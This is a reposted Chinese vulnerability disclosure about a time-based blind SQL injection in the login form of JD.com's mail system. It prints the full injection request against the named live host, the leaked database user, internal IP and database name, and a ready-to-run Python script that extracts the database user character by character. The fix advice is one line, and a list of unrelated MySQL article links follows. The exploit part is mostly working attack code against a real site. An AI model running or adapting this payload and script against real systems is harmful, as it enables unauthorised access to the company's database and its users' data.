京东商城某重要系统MySQL注射(附验证脚本)
2016-02-15 11:10
746 查看
京东商城某重要系统MySQL注射(附验证脚本)
code 区域
参数txtUser可注入,MySQL time blind。benchmark(15000000,md5(1)),响应时间大于2.0s。
code 区域
code 区域
![](http://static.wooyun.org/wooyun/upload/201512/26171819e3e783522c4206e7008ac5d4702f23a9.png)
python验证脚本:
code 区域
详细说明:
注射点:code 区域
POST https://mail.jd.com/Erpout/Logon.aspx captcha=test&destination=https://mail.jd.com/owa/&flags=0&forcedownlevel=0&isflag=0&isUtf8=1&maindo=mail.jd.com&showCheck=0&trusted=4&txtPassword=test&txtUser=aaaa'XOR(if(ascii(mid(user(),1,1))=106%2cbenchmark(10000000,md5(1))%2c0))OR'bbb&__EVENTVALIDATION=/wEWBwLxrpTlDwKK4MvjBQLB2tiHDgK1qbSRCwLk6JP4DALErdS5DwKqh7gQj3wgMfb0vbvb1oZ%2bQLNUO5k2Fs0%3d&__VIEWSTATE=/wEPDwULLTEyOTM4NDQ0ODFkZJ5XXKyC0nN6Jccew80z8q/DFEs5
参数txtUser可注入,MySQL time blind。benchmark(15000000,md5(1)),响应时间大于2.0s。
漏洞证明:
猜解MySQL user(),得到:code 区域
[Done]MySQL user is jdmail_rw@172.17.27.41
code 区域
database(): jdmail
![](http://static.wooyun.org/wooyun/upload/201512/26171819e3e783522c4206e7008ac5d4702f23a9.png)
python验证脚本:
code 区域
#encoding=gbk import httplib import time import string import sys import random import urllib headers = {'Content-Type': 'application/x-www-form-urlencoded','Cookie': 'ValiCode=PDC9BIL5P735'} payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.') print 'start to retrive MySQL user:' user = '' for i in range(1, 23): for payload in payloads: conn = httplib.HTTPSConnection('mail.jd.com', timeout=30) s = "captcha=test&destination=https://mail.jd.com/owa/&" \ "flags=0&forcedownlevel=0&isflag=0&isUtf8=1&maindo=mail.jd.com&showCheck=0" \ "&trusted=4&txtPassword=test&" \ "txtUser=aaaa'XOR(if(ascii(mid(user(),"+str(i)+",1))="+str(ord(payload))+"%2cbenchmark(15000000,md5(1))%2c0))OR'bbb" \ "&__EVENTVALIDATION=/wEWBwLxrpTlDwKK4MvjBQLB2tiHDgK1qbSRCwLk6JP4DALErdS5DwKqh7gQj3wgMfb0vbvb1oZ%2bQLNUO5k2Fs0%3d" \ "&__VIEWSTATE=/wEPDwULLTEyOTM4NDQ0ODFkZJ5XXKyC0nN6Jccew80z8q/DFEs5" conn.request(method='POST', url="/Erpout/Logon.aspx", body=s, headers = headers) start_time = time.time() html_doc = conn.getresponse().read() conn.close() if time.time() - start_time > 2.0: user += payload print '\n[In progress] %s' % user break else: print '.', print '\n[Done]MySQL user is', user
修复方案:
参数转义,过滤相关文章推荐
- 360某站点MySQL注射(附验证脚本)
- MySQL存储引擎
- Mysql 行列转换
- 自动删除Mysql备份(数组+for)
- mysql服务启动慢甚至无法启动问题
- windows下mysql服务启动"1067进程意外终止"错误解决方法
- MySQL集群搭建详解
- 转自MySQL官网的企业版的防火墙的一篇博客
- 辛星整理MySQL常见错误之1045,通常是密码过期
- MySQL_join开发技巧
- MySQL_CRUD基础语句
- MySQL重要但容易被忽略_MySQL自定义函数&存储过程
- mysql用户管理
- mac上mysql报错以及root密码忘记解决办法
- mysql中INSERT INTO… ON DUPLICATE KEY UPDATE用法
- MYSQL实现分页---LIMIT
- mysql 创建用户与授权、修改密码
- Erwin 生成 mysql 带注释(comment )的脚本
- MySQL中innodb引擎分析(初始化)
- 2016-2-14笔记